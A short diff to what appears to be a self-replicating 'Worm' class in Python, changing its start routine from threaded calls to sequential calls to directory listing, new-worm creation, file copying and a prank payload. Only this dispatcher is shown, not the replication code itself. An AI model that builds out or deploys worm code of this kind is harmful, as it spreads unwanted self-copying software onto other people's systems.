--- a/Worm v.1
+++ b/Worm v.1
@@ -164,12 +164,10 @@ class Worm:
     def start_worm_actions(self):
         print(self.target_dir_list)
         try:
-            self.threader.append(self.list_directories(self.path))
-            self.threader.append(self.create_new_worm())
-            self.threader.append(self.copy_existing_files())
-            self.threader.append(self.rick_and_roll())
-            self.threader.start()
-            self.threader.join()
+            self.list_directories(self.path)
+            self.create_new_worm()
+            self.copy_existing_files()
+            self.rick_and_roll()
         except:
             logging.warning("something went wrong")
         #self.connection_iterator()
